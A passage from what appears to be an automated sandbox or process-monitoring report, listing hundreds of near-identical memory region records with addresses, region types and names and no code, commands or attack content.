monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11019 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11020 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11021 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11022 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11023 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11024 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11025 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11026 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11027 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11028 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11029 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11030 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11031 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11032 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11033 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11034 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11035 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 11036 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11037 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11038 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11039 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11040 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11041 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11042 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11043 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11044 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11045 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11046 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11047 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11048 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11049 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11050 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11051 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11052 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11053 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11054 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11055 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11056 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11057 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11058 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11059 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11060 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11061 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11062 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11063 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11064 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11065 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11066 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11067 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11068 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11069 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11070 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11071 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11072 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11073 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11074 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11075 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11076 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11077 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 11078 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11079 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11080 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11081 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 11082 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11083 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11084 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11085 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11086 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11087 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11088 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11089 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11090 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11091 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11092 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11093 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11094 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11095 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11096 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11097 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 11098 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11099 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11100 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11101 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11102 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11103 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11104 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11105 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11106 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11107 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11108 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11109 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11110 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11111 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11112 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11113 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11114 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11115 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11116 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11117 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11118 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11119 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11120 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11121 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11122 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11123 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11124 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11125 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11126 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11127 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11128 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11129 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11130 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11131 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11132 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11133 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11134 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11135 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11136 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11137 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11138 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11139 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11140 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11141 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11142 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11143 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11144 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11145 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11146 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11147 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11148 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11149 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11150 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11151 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11152 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11153 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11154 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11155 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11156 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11157 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11158 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 11159 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11160 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11161 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11162 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11163 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11164 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11165 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11166 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11167 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11168 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11169 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11170 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11171 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11172 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11173 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11174 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11175 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11176 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11177 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11178 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11179 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11180 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11181 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11182 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11183 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11184 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11185 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11186 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11187 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11188 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11189 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11190 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11191 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11192 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11193 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 11194 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11195 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11196 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11197 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 11198 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11199 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11200 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11201 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 11202 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11203 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11204 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11205 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11206 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 